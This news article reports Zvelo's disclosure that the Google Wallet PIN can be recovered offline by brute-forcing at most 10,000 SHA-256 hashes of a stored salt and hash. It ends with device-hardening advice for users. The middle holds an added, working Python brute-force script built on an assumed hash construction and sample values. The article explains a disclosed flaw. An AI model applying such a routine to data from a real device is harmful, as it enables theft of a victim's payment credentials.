Web security provider Zvelo has uncovered a way to crack the Google Wallet PIN security feature.
Using an app called “Wallet Cracker,” Zvelo was able to expose the PIN of a Google Wallet account without entering a single invalid attempt – five invalid attempts and the wallet locks out.
Check out the video for a demonstration:
So how did they do it?
“Within the PIN information section was a long integer ‘salt’ and a SHA256 hex encoded string ‘hash’,” Zvelo said in a release. “Knowing that the PIN can only be a 4-digit numeric value, it dawned on us that a brute-force attack would only require calculating, at most, 10,000 SHA256 hashes. This is trivial even on a platform as limited as a smart phone. Proving this hypothesis took little time.”
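To make the arithmetic concrete, here is an added offline brute-force example written for this article; it is not Zvelo's “Wallet Cracker” code, and Google's exact hash construction is not spelled out on this page. The example assumes the stored value is SHA-256 over the decimal salt immediately followed by the four PIN digits (the concatenation order, the string encoding and the sample salt/PIN/hash values are all constructed assumptions). The point it demonstrates does not depend on those details: whatever the construction, a per-wallet salt only defeats precomputed tables, and an attacker who can read the salt and the hash still needs at most 10,000 SHA-256 computations and never touches the five-attempt lockout, because no guess is ever submitted to the wallet.

```python
import hashlib
import time


def wallet_hash(salt: int, pin: str) -> str:
    """Assumed construction: SHA-256 over str(salt) + pin, hex encoded.

    This mirrors the article's description of a long-integer salt and a
    SHA256 hex string; the concatenation order is an assumption.
    """
    return hashlib.sha256(f"{salt}{pin}".encode("ascii")).hexdigest()


def crack_pin(salt: int, target_hash: str, digits: int = 4):
    """Offline brute force over every numeric PIN of the given length.

    Returns (pin, hashes_computed). Nothing is sent to the wallet, so the
    five-attempt lockout never fires; the cost is at most 10**digits hashes.
    """
    target = target_hash.lower()
    for n in range(10 ** digits):
        pin = f"{n:0{digits}d}"          # keep leading zeros: 0042, not 42
        if wallet_hash(salt, pin) == target:
            return pin, n + 1
    return None, 10 ** digits


def worst_case_seconds(salt: int, digits: int = 4) -> float:
    """Measure how long the full 10**digits search space takes on this host.

    Uses a hash that matches no PIN so the loop runs to completion.
    """
    start = time.perf_counter()
    crack_pin(salt, "f" * 64, digits)
    return time.perf_counter() - start


# Constructed sample data standing in for what would be read from the
# Wallet's PIN information section on a rooted device.
SAMPLE_SALT = 1234567890123456789
SAMPLE_PIN = "7342"
SAMPLE_HASH = wallet_hash(SAMPLE_SALT, SAMPLE_PIN)

if __name__ == "__main__":
    pin, tried = crack_pin(SAMPLE_SALT, SAMPLE_HASH)
    print(f"recovered PIN {pin} after {tried} SHA-256 computations")
    print(f"exhausting all 10,000 PINs takes {worst_case_seconds(SAMPLE_SALT):.3f}s")
```

The timing function exists to underline the quote above: even an interpreted loop on a laptop finishes the entire 10,000-hash search in well under a second, which is why Zvelo could describe the attack as trivial on a phone. Changing the hash function or the salt length does not change the 10,000 figure; only a larger secret (a longer PIN or a key the attacker cannot read) or moving the comparison somewhere the attacker cannot reach would.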
Zvelo says it has shared the discovery with Google, who confirmed the issue and agreed to “work quickly to resolve it.” In the meantime, Zvelo offers the following recommendations for Wallet users:
Do Not “Root” the Cell Phone – Doing so will be one less step for a thief.
Enable Lock Screens – Face Unlock, Pattern, PIN and Password all increase physical security to the device. Slide, however, does not.
Disable USB Debugging – When enabled, the data on mobile devices can be accessed without first passing a lock screen challenge unless Full Disk Encryption is also enabled.
Enable Full Disk Encryption – This will prevent even USB Debugging from bypassing the lock screen.
Keep the Device Up-To-Date – Ensure the device is current with the latest official software. Unfortunately, users are largely at the mercy of their carrier and cell phone manufacturer for this. Using only official software and keeping devices up-to-date is the best way to minimize vulnerabilities and increase security overall.